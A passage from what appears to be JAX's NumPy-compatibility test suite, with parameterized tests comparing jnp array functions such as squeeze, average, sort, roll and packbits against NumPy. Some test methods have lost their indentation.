rng = jtu.rand_default(self.rng())
np_fun = lambda x: np.swapaxes(x, ax1, ax2)
jnp_fun = lambda x: jnp.swapaxes(x, ax1, ax2)
args_maker = lambda: [rng(arg_shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_inshape={}_axis={!r}".format(
          jtu.format_shape_dtype_string(arg_shape, dtype), ax),
       "arg_shape": arg_shape, "dtype": dtype, "ax": ax}
      for arg_shape, ax in [
          ((3, 1), None),
          ((3, 1), 1),
          ((3, 1), -1),
          ((3, 1), np.array(1)),
          ((1, 3, 1), (0, 2)),
          ((1, 3, 1), (0,)),
          ((1, 4, 1), (np.array(0),))]
      for dtype in default_dtypes))
  def testSqueeze(self, arg_shape, dtype, ax):
    """Checks jnp.squeeze with None, int, np scalar, and tuple axes vs np."""
    rng = jtu.rand_default(self.rng())
    np_fun = lambda x: np.squeeze(x, ax)
    jnp_fun = lambda x: jnp.squeeze(x, ax)
    args_maker = lambda: [rng(arg_shape, dtype)]
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
    self._CompileAndCheck(jnp_fun, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_shape={}_axis={}_weights={}_returned={}".format(
          jtu.format_shape_dtype_string(shape, dtype),
          axis,
          (None if weights_shape is None else jtu.format_shape_dtype_string(weights_shape, dtype)),
          returned),
       "shape": shape, "dtype": dtype, "axis": axis,
       "weights_shape": weights_shape, "returned": returned}
      for shape, dtype in _shape_and_dtypes(nonempty_shapes, number_dtypes)
      for axis in list(range(-len(shape), len(shape))) + [None]
      # `weights_shape` is either `None`, same as the averaged axis, or same as
      # that of the input
      for weights_shape in ([None, shape] if axis is None or len(shape) == 1
                            else [None, (shape[axis],), shape])
      for returned in [False, True]))
  def testAverage(self, shape, dtype, axis, weights_shape, returned):
    """Checks jnp.average (weighted/unweighted, with/without sum-of-weights)."""
    rng = jtu.rand_default(self.rng())
    if weights_shape is None:
      np_fun = lambda x: np.average(x, axis, returned=returned)
      jnp_fun = lambda x: jnp.average(x, axis, returned=returned)
      args_maker = lambda: [rng(shape, dtype)]
    else:
      np_fun = lambda x, weights: np.average(x, axis, weights, returned)
      jnp_fun = lambda x, weights: jnp.average(x, axis, weights, returned)
      args_maker = lambda: [rng(shape, dtype), rng(weights_shape, dtype)]
    np_fun = _promote_like_jnp(np_fun, inexact=True)
    tol = {dtypes.bfloat16: 2e-1, np.float16: 1e-2, np.float32: 1e-5,
           np.float64: 1e-12, np.complex64: 1e-5}
    check_dtypes = shape is not jtu.PYTHON_SCALAR_SHAPE
    try:
      self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                              check_dtypes=check_dtypes, tol=tol)
    except ZeroDivisionError:
      # Weights may sum to zero; NumPy raises, and we don't check that path.
      self.skipTest("don't support checking for ZeroDivisionError")
    self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=check_dtypes,
                          rtol=tol, atol=tol)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name":
       f"_arg{i}_ndmin={ndmin}_dtype={np.dtype(dtype) if dtype else None}",
       "arg": arg, "ndmin": ndmin, "dtype": dtype}
      for i, (arg, dtypes) in enumerate([
          ([True, False, True], all_dtypes),
          (3., all_dtypes),
          ([1, 2, 3], all_dtypes),
          (np.array([1, 2, 3], dtype=np.int64), all_dtypes),
          ([1., 2., 3.], all_dtypes),
          ([[1, 2], [3, 4], [5, 6]], all_dtypes),
          ([[1, 2.], [3, 4], [5, 6]], all_dtypes),
          ([[1., 2j], [3., 4.], [5., 6.]], complex_dtypes),
          ([[3, np.array(2, dtype=jnp.float_), 1],
           np.arange(3., dtype=jnp.float_)], all_dtypes),
      ])
      for dtype in [None] + dtypes
      for ndmin in [None, np.ndim(arg), np.ndim(arg) + 1, np.ndim(arg) + 2]))
  def testArray(self, arg, ndmin, dtype):
    """Checks jnp.array dtype canonicalization and ndmin handling vs np.array."""
    args_maker = lambda: [arg]
    # jnp.array canonicalizes dtypes; feed np.array the canonical dtype so the
    # two sides are comparable.
    canonical_dtype = dtypes.canonicalize_dtype(dtype or np.array(arg).dtype)
    if ndmin is not None:
      np_fun = partial(np.array, ndmin=ndmin, dtype=canonical_dtype)
      jnp_fun = partial(jnp.array, ndmin=ndmin, dtype=dtype)
    else:
      np_fun = partial(np.array, dtype=canonical_dtype)
      jnp_fun = partial(jnp.array, dtype=dtype)
    # We are testing correct canonicalization behavior here, so we turn off the
    # permissive canonicalization logic in the test harness.
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                            canonicalize_dtypes=False)
    self._CompileAndCheck(jnp_fun, args_maker)
  def testArrayUnsupportedDtypeError(self):
    """jnp.array must reject structured (record) dtypes with a TypeError."""
    with self.assertRaisesRegex(TypeError,
                                "JAX only supports number and bool dtypes.*"):
      jnp.array(3, [('a','<i4'),('b','<i4')])
  def testArrayFromInteger(self):
    """Python ints convert to the canonical int dtype; overflow must raise."""
    int_dtype = dtypes.canonicalize_dtype(jnp.int64)
    int_max = jnp.iinfo(int_dtype).max
    int_min = jnp.iinfo(int_dtype).min
    # Values at extremes are converted correctly.
    for val in [int_min, 0, int_max]:
      self.assertEqual(jnp.array(val).dtype, int_dtype)
    # out of bounds leads to an OverflowError
    val = int_max + 1
    with self.assertRaisesRegex(OverflowError, f"Python int {val} too large to convert to {int_dtype.name}"):
      jnp.array(val)
    # explicit uint64 should work
    if config.x64_enabled:
      self.assertEqual(np.uint64(val), jnp.array(val, dtype='uint64'))
# TODO(jakevdp): fix list inputs to jnp.array and enable the following test
# def testArrayFromList(self):
# int_max = jnp.iinfo(jnp.int64).max
# int_min = jnp.iinfo(jnp.int64).min
#
# # Values at extremes are converted correctly.
# for val in [int_min, 0, int_max]:
# self.assertEqual(jnp.array([val]).dtype, dtypes.canonicalize_dtype('int64'))
#
# # list of values results in promoted type.
# self.assertEqual(jnp.array([0, np.float16(1)]).dtype, jnp.result_type('int64', 'float16'))
#
# # out of bounds leads to an OverflowError
# val = int_min - 1
# with self.assertRaisesRegex(OverflowError, f"Python int {val} too large to convert to int64"):
# jnp.array([0, val])
def testIssue121(self):
assert not np.isscalar(jnp.array(3))
  def testArrayOutputsDeviceArrays(self):
    """jnp.array must return device arrays for empty inputs and __array__ objects."""
    assert xla.type_is_device_array(jnp.array([]))
    assert xla.type_is_device_array(jnp.array(np.array([])))
    # An object exposing only the __array__ protocol must also be accepted.
    class NDArrayLike:
      def __array__(self, dtype=None):
        return np.array([], dtype=dtype)
    assert xla.type_is_device_array(jnp.array(NDArrayLike()))
    # NOTE(mattjj): disabled b/c __array__ must produce ndarrays
    # class DeviceArrayLike:
    #     def __array__(self, dtype=None):
    #         return jnp.array([], dtype=dtype)
    # assert  xla.type_is_device_array(jnp.array(DeviceArrayLike()))
  def testArrayMethod(self):
    """jnp.array must honor an object's __array__ method."""
    class arraylike(object):
      dtype = np.float32
      def __array__(self, dtype=None):
        return np.array(3., dtype=dtype)
    a = arraylike()
    ans = jnp.array(a)
    assert ans == 3.
def testMemoryView(self):
ans = jnp.array(bytearray(b'\x2a'))
self.assertAllClose(
ans,
np.array([0x2a], dtype=np.uint8))
  def testIsClose(self):
    """Checks jnp.isclose (eager and jitted, with/without equal_nan) against
    np.isclose over finite, infinite, and NaN inputs."""
    c_isclose = api.jit(jnp.isclose)
    c_isclose_nan = api.jit(partial(jnp.isclose, equal_nan=True))
    n = 2
    rng = np.random.RandomState(0)
    x = rng.randn(n, 1)
    y = rng.randn(n, 1)
    inf = np.asarray(n * [np.inf]).reshape([n, 1])
    nan = np.asarray(n * [np.nan]).reshape([n, 1])
    args = [x, y, inf, -inf, nan]
    # Compare every pair of argument kinds.
    for arg0 in args:
      for arg1 in args:
        result_np = np.isclose(arg0, arg1)
        result_jax = jnp.isclose(arg0, arg1)
        result_jit = c_isclose(arg0, arg1)
        self.assertTrue(jnp.all(jnp.equal(result_np, result_jax)))
        self.assertTrue(jnp.all(jnp.equal(result_np, result_jit)))
        result_np = np.isclose(arg0, arg1, equal_nan=True)
        result_jax = jnp.isclose(arg0, arg1, equal_nan=True)
        result_jit = c_isclose_nan(arg0, arg1)
        self.assertTrue(jnp.all(jnp.equal(result_np, result_jax)))
        self.assertTrue(jnp.all(jnp.equal(result_np, result_jit)))
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_x={}_y={}_equal_nan={}".format(x, y, equal_nan),
       "x": x, "y": y, "equal_nan": equal_nan}
      for x, y in itertools.product([
          1, [1], [1, 1 + 1E-4], [1, np.nan]], repeat=2)
      for equal_nan in [True, False]))
  def testAllClose(self, x, y, equal_nan):
    """Checks jnp.allclose against np.allclose, including NaN handling."""
    jnp_fun = partial(jnp.allclose, equal_nan=equal_nan, rtol=1E-3)
    np_fun = partial(np.allclose, equal_nan=equal_nan, rtol=1E-3)
    args_maker = lambda: [x, y]
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
    self._CompileAndCheck(jnp_fun, args_maker)
  def testZeroStridesConstantHandler(self):
    """Broadcast (zero-stride) NumPy constants must be handled correctly
    when captured as constants inside a jitted function."""
    raw_const = np.random.RandomState(0).randn(1, 2, 1, 1, 5, 1)
    const = np.broadcast_to(raw_const, (3, 2, 3, 4, 5, 6))
    def fun(x):
      return x * const
    fun = api.jit(fun)
    out_val = fun(3.)
    self.assertAllClose(out_val, 3. * const, check_dtypes=False)
  def testIsInstanceNdarrayDuringTracing(self):
    """Tracer values must satisfy isinstance(x, jnp.ndarray) under jit."""
    arr = np.ones(3)
    @api.jit
    def f(x):
      self.assertIsInstance(x, jnp.ndarray)
      return jnp.sum(x)
    f(arr)
  def testNonArrayErrorMessage(self):
    """Passing a raw Python list to jnp ops must raise TypeError,
    both eagerly and under jit."""
    x = [1., 2.]
    y = np.array([3., 4.])
    def g(x, y):
      return jnp.add(x, y)
    def f(x, y):
      return jnp.dot(x, y)
    self.assertRaises(TypeError, lambda: g(x, y))
    self.assertRaises(TypeError, lambda: f(x, y))
    self.assertRaises(TypeError, lambda: api.jit(g)(x, y))
    self.assertRaises(TypeError, lambda: api.jit(f)(x, y))
  def testAbstractionErrorMessage(self):
    """Data-dependent Python control flow under jit must raise the
    appropriate tracer errors."""
    # Using a traced value as a loop bound -> integer conversion error.
    @api.jit
    def f(x, n):
      for _ in range(n):
        x = x * x
      return x
    self.assertRaises(jax.errors.TracerIntegerConversionError, lambda: f(3., 3))
    # Branching on a traced value -> concretization error.
    @api.jit
    def g(x):
      if x > 0.:
        return x * 2
      else:
        return x + 2
    self.assertRaises(jax.errors.ConcretizationTypeError, lambda: g(3.))
  def testTracingPrimitiveWithNoTranslationErrorMessage(self):
    """A not-implemented primitive should only fail when traced (currently
    disabled pending a jax3 update)."""
    # TODO(mattjj): update this for jax3
    self.skipTest("test needs jax3 update")
    foo = jnp._not_implemented(lambda x: x)
    # No error if there's no tracing.
    foo(np.arange(3))
    cfoo = api.jit(foo)
    self.assertRaises(NotImplementedError, lambda: cfoo(np.arange(3)))
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_axis={}".format(
          jtu.format_shape_dtype_string(shape, dtype), axis),
       "shape": shape, "dtype": dtype, "axis": axis}
      for shape in [(3,), (2, 3)]
      for dtype in default_dtypes
      for axis in list(range(-len(shape), len(shape))) + [None] + [tuple(range(len(shape)))]  # Test negative axes and tuples
  ))
  def testFlip(self, shape, dtype, axis):
    """Checks jnp.flip against np.flip over int, None, and tuple axes."""
    rng = jtu.rand_default(self.rng())
    args_maker = self._GetArgsMaker(rng, [shape], [dtype])
    jnp_op = lambda x: jnp.flip(x, axis)
    np_op = lambda x: np.flip(x, axis)
    self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
    self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}".format(
jtu.format_shape_dtype_string(shape, dtype)),
"shape": shape, "dtype": dtype}
for shape in [(3,), (2, 3), (3, 2, 4)]
for dtype in default_dtypes))
def testFlipud(self, shape, dtype):
rng = jtu.rand_default(self.rng())
args_maker = self._GetArgsMaker(rng, [shape], [dtype])
jnp_op = lambda x: jnp.flipud(x)
np_op = lambda x: np.flipud(x)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}".format(
jtu.format_shape_dtype_string(shape, dtype)),
"shape": shape, "dtype": dtype}
for shape in [(3, 2), (2, 3), (3, 2, 4)]
for dtype in default_dtypes))
def testFliplr(self, shape, dtype):
rng = jtu.rand_default(self.rng())
args_maker = self._GetArgsMaker(rng, [shape], [dtype])
jnp_op = lambda x: jnp.fliplr(x)
np_op = lambda x: np.fliplr(x)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_k={}_axes={}".format(
          jtu.format_shape_dtype_string(shape, dtype), k, axes),
       "shape": shape, "dtype": dtype, "k": k, "axes": axes}
      for shape, axes in [
          [(2, 3), (0, 1)],
          [(2, 3), (1, 0)],
          [(4, 3, 2), (0, 2)],
          [(4, 3, 2), (2, 1)],
      ]
      for k in range(-3, 4)
      for dtype in default_dtypes))
  def testRot90(self, shape, dtype, k, axes):
    """Checks jnp.rot90 against np.rot90 for positive and negative k."""
    rng = jtu.rand_default(self.rng())
    args_maker = self._GetArgsMaker(rng, [shape], [dtype])
    jnp_op = lambda x: jnp.rot90(x, k, axes)
    np_op = lambda x: np.rot90(x, k, axes)
    self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
    self._CompileAndCheck(jnp_op, args_maker)
# TODO(mattjj): test infix operator overrides
def testRavel(self):
rng = np.random.RandomState(0)
args_maker = lambda: [rng.randn(3, 4).astype("float32")]
self._CompileAndCheck(lambda x: x.ravel(), args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_shape={}_order={}_mode={}".format(
          shape, order, mode),
       "shape": shape, "order": order, "mode": mode}
      for shape in nonempty_nonscalar_array_shapes
      for order in ['C', 'F']
      for mode in ['wrap', 'clip', 'raise']))
  @jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
  def testRavelMultiIndex(self, shape, order, mode):
    """Checks jnp.ravel_multi_index against np, including out-of-bounds
    indices and the jit restriction on mode='raise'."""
    # generate indices in each dimension with a few out of bounds.
    rngs = [jtu.rand_int(self.rng(), low=-1, high=dim + 1)
            for dim in shape]
    # generate multi_indices of different dimensions that broadcast.
    args_maker = lambda: [tuple(rng(ndim * (3,), jnp.int_)
                                for ndim, rng in enumerate(rngs))]
    def np_fun(x):
      try:
        return np.ravel_multi_index(x, shape, order=order, mode=mode)
      except ValueError as err:
        if str(err).startswith('invalid entry'):
          # sentinel indicating expected error.
          return -999
        else:
          raise
    def jnp_fun(x):
      try:
        return jnp.ravel_multi_index(x, shape, order=order, mode=mode)
      except ValueError as err:
        if str(err).startswith('invalid entry'):
          # sentinel indicating expected error.
          return -999
        else:
          raise
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
    if mode == 'raise':
      # mode='raise' requires concrete values, so it cannot be jitted.
      msg = ("The error occurred because ravel_multi_index was jit-compiled "
             "with mode='raise'. Use mode='wrap' or mode='clip' instead.")
      with self.assertRaisesRegex(jax.core.ConcretizationTypeError, msg):
        jax.jit(jnp_fun)(*args_maker())
    else:
      self._CompileAndCheck(jnp_fun, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_ashape={}{}_cshapes={}{}_mode={}".format(
          adtype.__name__, ashape, cdtype.__name__, cshapes, mode),
       "ashape": ashape, "adtype": adtype, "cshapes": cshapes, "cdtype": cdtype, "mode": mode}
      for ashape in ((), (4,), (3, 4))
      for cshapes in [
          [(), (4,)],
          [(3, 4), (4,), (3, 1)]
      ]
      for adtype in int_dtypes
      for cdtype in default_dtypes
      for mode in ['wrap', 'clip', 'raise']))
  def testChoose(self, ashape, adtype, cshapes, cdtype, mode):
    """Checks jnp.choose against np.choose, including the jit restriction
    on mode='raise'."""
    rng = jtu.rand_default(self.rng())
    args_maker = lambda: [rng(ashape, adtype), [rng(s, cdtype) for s in cshapes]]
    def np_fun(a, c):
      try:
        return np.choose(a, c, mode=mode)
      except ValueError as err:
        if mode == 'raise' and str(err).startswith('invalid entry'):
          return -999  # sentinel indicating expected error.
        else:
          raise
    def jnp_fun(a, c):
      try:
        return jnp.choose(a, c, mode=mode)
      except ValueError as err:
        if mode == 'raise' and str(err).startswith('invalid entry'):
          return -999  # sentinel indicating expected error.
        else:
          raise
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
    if mode == 'raise':
      # mode='raise' requires concrete index values, so it cannot be jitted.
      msg = ("The error occurred because jnp.choose was jit-compiled"
             " with mode='raise'. Use mode='wrap' or mode='clip' instead.")
      with self.assertRaisesRegex(jax.core.ConcretizationTypeError, msg):
        jax.jit(jnp_fun)(*args_maker())
    else:
      self._CompileAndCheck(jnp_fun, args_maker)
  @parameterized.parameters(
      (0, (2, 1, 3)),
      (5, (2, 1, 3)),
      (0, ()),
      ([0, 1, 2], (2, 2)),
      ([[[0, 1], [2, 3]]], (2, 2)))
  def testUnravelIndex(self, flat_index, shape):
    """Checks jnp.unravel_index against np.unravel_index for scalar and
    nested-list indices."""
    args_maker = lambda: (flat_index, shape)
    self._CheckAgainstNumpy(np.unravel_index, jnp.unravel_index,
                            args_maker)
    self._CompileAndCheck(jnp.unravel_index, args_maker)
  def testUnravelIndexOOB(self):
    """Out-of-bounds flat indices are clipped/wrapped rather than raising
    (jnp-specific behavior; NumPy would error here)."""
    self.assertEqual(jnp.unravel_index(2, (2,)), (1,))
    self.assertEqual(jnp.unravel_index(-2, (2, 1, 3,)), (1, 0, 1))
    self.assertEqual(jnp.unravel_index(-3, (2,)), (0,))
def testAstype(self):
rng = np.random.RandomState(0)
args_maker = lambda: [rng.randn(3, 4).astype("float32")]
np_op = lambda x: np.asarray(x).astype(jnp.int32)
jnp_op = lambda x: jnp.asarray(x).astype(jnp.int32)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}".format(
          jtu.format_shape_dtype_string(shape, dtype)),
       "shape": shape, "dtype": dtype}
      for shape in array_shapes
      for dtype in all_dtypes))
  def testNbytes(self, shape, dtype):
    """Checks the ndarray.nbytes attribute against NumPy."""
    rng = jtu.rand_default(self.rng())
    np_op = lambda x: np.asarray(x).nbytes
    jnp_op = lambda x: jnp.asarray(x).nbytes
    args_maker = lambda: [rng(shape, dtype)]
    self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
    self._CompileAndCheck(jnp_op, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_dtype={}".format(
          jtu.format_shape_dtype_string(shape, a_dtype), dtype),
       "shape": shape, "a_dtype": a_dtype, "dtype": dtype}
      for shape in [(8,), (3, 8)]  # last dim = 8 to ensure shape compatibility
      for a_dtype in (default_dtypes + unsigned_dtypes + bool_dtypes)
      for dtype in (default_dtypes + unsigned_dtypes + bool_dtypes)))
  def testView(self, shape, a_dtype, dtype):
    """Checks ndarray.view reinterpretation against NumPy for all dtype pairs."""
    if jtu.device_under_test() == 'tpu':
      if jnp.dtype(a_dtype).itemsize in [1, 2] or jnp.dtype(dtype).itemsize in [1, 2]:
        self.skipTest("arr.view() not supported on TPU for 8- or 16-bit types.")
    if not config.x64_enabled:
      if jnp.dtype(a_dtype).itemsize == 8 or jnp.dtype(dtype).itemsize == 8:
        self.skipTest("x64 types are disabled by jax_enable_x64")
    # Full-range random bits so all byte patterns are exercised.
    rng = jtu.rand_fullrange(self.rng())
    args_maker = lambda: [rng(shape, a_dtype)]
    np_op = lambda x: np.asarray(x).view(dtype)
    jnp_op = lambda x: jnp.asarray(x).view(dtype)
    # Above may produce signaling nans; ignore warnings from invalid values.
    with np.errstate(invalid='ignore'):
      self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
      self._CompileAndCheck(jnp_op, args_maker)
  def testPathologicalFloats(self):
    """view() round-trips must preserve the exact bit patterns of special
    float32 values (infs, quiet/signaling/nonstandard NaNs, signed zeros)."""
    args_maker = lambda: [np.array([
      0b_0111_1111_1000_0000_0000_0000_0000_0000,  # inf
      0b_1111_1111_1000_0000_0000_0000_0000_0000,  # -inf
      0b_0111_1111_1100_0000_0000_0000_0000_0000,  # qnan
      0b_1111_1111_1100_0000_0000_0000_0000_0000,  # -qnan
      0b_0111_1111_1000_0000_0000_0000_0000_0001,  # snan
      0b_1111_1111_1000_0000_0000_0000_0000_0001,  # -snan
      0b_0111_1111_1000_0000_0000_1100_0000_0000,  # nonstandard nan
      0b_1111_1111_1000_0000_0000_1100_0000_0000,  # -nonstandard nan
      0b_0000_0000_0000_0000_0000_0000_0000_0000,  # zero
      0b_1000_0000_0000_0000_0000_0000_0000_0000,  # -zero
    ], dtype='uint32')]
    np_op = lambda x: np.asarray(x).view('float32').view('uint32')
    jnp_op = lambda x: jnp.asarray(x).view('float32').view('uint32')
    self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
    self._CompileAndCheck(jnp_op, args_maker)
# TODO(mattjj): test other ndarray-like method overrides
  def testNpMean(self):
    """np.mean applied to a jnp array must produce the correct value."""
    # from https://github.com/google/jax/issues/125
    x = lax.add(jnp.eye(3, dtype=float), 0.)
    ans = np.mean(x)
    self.assertAllClose(ans, np.array(1./3), check_dtypes=False)
def testArangeOnFloats(self):
# from https://github.com/google/jax/issues/145
self.assertAllClose(np.arange(0.0, 1.0, 0.1, dtype=jnp.float_),
jnp.arange(0.0, 1.0, 0.1))
# from https://github.com/google/jax/issues/3450
self.assertAllClose(np.arange(2.5, dtype=jnp.float_),
jnp.arange(2.5))
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_axis={}".format(
          jtu.format_shape_dtype_string(shape, dtype), axis),
       "shape": shape, "dtype": dtype, "axis": axis}
      for dtype in all_dtypes
      for shape in nonzerodim_shapes
      for axis in (None, *range(len(shape)))))
  def testSort(self, dtype, shape, axis):
    """jnp.sort matches np.sort for every dtype/shape/axis (and axis=None)."""
    # rand_some_equal yields repeated values, exercising ordering of ties.
    rng = jtu.rand_some_equal(self.rng())
    args_maker = lambda: [rng(shape, dtype)]
    jnp_fun = jnp.sort
    np_fun = np.sort
    if axis is not None:
      jnp_fun = partial(jnp_fun, axis=axis)
      np_fun = partial(np_fun, axis=axis)
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
    self._CompileAndCheck(jnp_fun, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_axis={}".format(
          jtu.format_shape_dtype_string(shape, dtype), axis),
       "shape": shape, "dtype": dtype, "axis": axis}
      for dtype in all_dtypes
      for shape in one_dim_array_shapes
      for axis in [None]))
  def testSortComplex(self, dtype, shape, axis):
    """jnp.sort_complex matches np.sort_complex on 1D arrays of any dtype."""
    rng = jtu.rand_some_equal(self.rng())
    args_maker = lambda: [rng(shape, dtype)]
    # check_dtypes=False: np.sort_complex always returns a complex result,
    # whose precision may differ from jnp's promotion — values must agree.
    self._CheckAgainstNumpy(np.sort_complex, jnp.sort_complex, args_maker, check_dtypes=False)
    self._CompileAndCheck(jnp.sort_complex, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_input_type={}_axis={}".format(
          jtu.format_shape_dtype_string(shape, dtype),
          input_type.__name__, axis),
       "shape": shape, "dtype": dtype, "input_type": input_type, "axis": axis}
      for dtype in all_dtypes
      for shape in nonempty_nonscalar_array_shapes
      for input_type in [np.array, tuple]
      for axis in (-1, *range(len(shape) - 1))))
  def testLexsort(self, dtype, shape, input_type, axis):
    """jnp.lexsort matches np.lexsort for array and tuple-of-rows inputs."""
    rng = jtu.rand_some_equal(self.rng())
    # input_type wraps the keys either as a single ndarray or a tuple of rows.
    args_maker = lambda: [input_type(rng(shape, dtype))]
    jnp_op = lambda x: jnp.lexsort(x, axis=axis)
    np_op = lambda x: np.lexsort(x, axis=axis)
    self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
    self._CompileAndCheck(jnp_op, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_axis={}".format(
          jtu.format_shape_dtype_string(shape, dtype), axis),
       "shape": shape, "dtype": dtype, "axis": axis}
      for dtype in all_dtypes
      for shape in nonzerodim_shapes
      for axis in (None, *range(len(shape)))))
  def testArgsort(self, dtype, shape, axis):
    """jnp.argsort matches np.argsort for every dtype/shape/axis (and axis=None)."""
    # rand_some_equal yields repeated values, exercising index order for ties.
    rng = jtu.rand_some_equal(self.rng())
    args_maker = lambda: [rng(shape, dtype)]
    jnp_fun = jnp.argsort
    np_fun = np.argsort
    if axis is not None:
      jnp_fun = partial(jnp_fun, axis=axis)
      np_fun = partial(np_fun, axis=axis)
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
    self._CompileAndCheck(jnp_fun, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}".format(
          jtu.format_shape_dtype_string(shape, dtype)),
       "shape": shape, "dtype": dtype}
      for dtype in all_dtypes
      for shape in nonzerodim_shapes))
  def testMsort(self, dtype, shape):
    """jnp.msort matches np.msort (sort along the first axis).

    NOTE(review): np.msort is deprecated in newer NumPy releases in favor of
    np.sort(a, axis=0) — this test will need updating when support is dropped.
    """
    rng = jtu.rand_some_equal(self.rng())
    args_maker = lambda: [rng(shape, dtype)]
    self._CheckAgainstNumpy(np.msort, jnp.msort, args_maker)
    self._CompileAndCheck(jnp.msort, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_shifts={}_axis={}".format(
          jtu.format_shape_dtype_string(shape, dtype),
          shifts, axis),
       "shape": shape, "dtype": dtype, "shifts": shifts, "axis": axis}
      for dtype in all_dtypes
      for shape in [(3, 4), (3, 4, 5), (7, 4, 0)]
      for shifts, axis in [
        (3, None),
        (1, 1),
        ((3,), (0,)),
        ((-2,), (-2,)),
        ((1, 2), (0, -1)),
        ((4, 2, 5, 5, 2, 4), None),
        (100, None),
      ]))
  def testRoll(self, shape, dtype, shifts, axis):
    """jnp.roll matches np.roll for scalar/tuple shifts, negative axes,
    shifts larger than the array, and zero-size dimensions."""
    rng = jtu.rand_default(self.rng())
    # shifts is passed as a traced array argument, not baked in as a constant.
    args_maker = lambda: [rng(shape, dtype), np.array(shifts)]
    jnp_op = partial(jnp.roll, axis=axis)
    np_op = partial(np.roll, axis=axis)
    self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
    self._CompileAndCheck(jnp_op, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_axis={}_start={}".format(
          jtu.format_shape_dtype_string(shape, dtype),
          axis, start),
       "shape": shape, "dtype": dtype, "axis": axis,
       "start": start}
      for dtype in all_dtypes
      for shape in [(1, 2, 3, 4)]
      for axis in [-3, 0, 2, 3]
      for start in [-4, -1, 2, 4]))
  def testRollaxis(self, shape, dtype, start, axis):
    """jnp.rollaxis matches np.rollaxis, including negative axis/start."""
    rng = jtu.rand_default(self.rng())
    args_maker = lambda: [rng(shape, dtype)]
    jnp_op = partial(jnp.rollaxis, axis=axis, start=start)
    np_op = partial(np.rollaxis, axis=axis, start=start)
    self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
    self._CompileAndCheck(jnp_op, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_axis={}_bitorder={}".format(
          jtu.format_shape_dtype_string(shape, dtype), axis, bitorder),
       "shape": shape, "dtype": dtype, "axis": axis,
       "bitorder": bitorder}
      for dtype in [np.uint8, np.bool_]
      for bitorder in ['big', 'little']
      for shape in [(1, 2, 3, 4)]
      for axis in [None, 0, 1, -2, -1]))
  def testPackbits(self, shape, dtype, axis, bitorder):
    """jnp.packbits matches np.packbits for uint8/bool input, both bit orders."""
    # rand_some_zero guarantees a mix of zero and nonzero bits to pack.
    rng = jtu.rand_some_zero(self.rng())
    args_maker = lambda: [rng(shape, dtype)]
    jnp_op = partial(jnp.packbits, axis=axis, bitorder=bitorder)
    np_op = partial(np.packbits, axis=axis, bitorder=bitorder)
    self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
    self._CompileAndCheck(jnp_op, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_axis={}_bitorder={}_count={}".format(
          jtu.format_shape_dtype_string(shape, dtype), axis, bitorder, count),
       "shape": shape, "dtype": dtype, "axis": axis, "bitorder": bitorder,
       "count": count}
      for dtype in [np.uint8]
      for bitorder in ['big', 'little']
      for shape in [(1, 2, 3, 4)]
      for axis in [None, 0, 1, -2, -1]
      for count in [None, 20]))
  def testUnpackbits(self, shape, dtype, axis, bitorder, count):
    """jnp.unpackbits matches np.unpackbits for both bit orders and axes.

    NOTE(review): `count` is parameterized but never forwarded to either op
    below, so the count=20 cases silently duplicate the count=None cases.
    Forward `count=count` once its semantics (count exceeding the available
    bits along small axes) are verified against np.unpackbits.
    """
    rng = jtu.rand_int(self.rng(), 0, 256)
    args_maker = lambda: [rng(shape, dtype)]
    jnp_op = partial(jnp.unpackbits, axis=axis, bitorder=bitorder)
    np_op = partial(np.unpackbits, axis=axis, bitorder=bitorder)
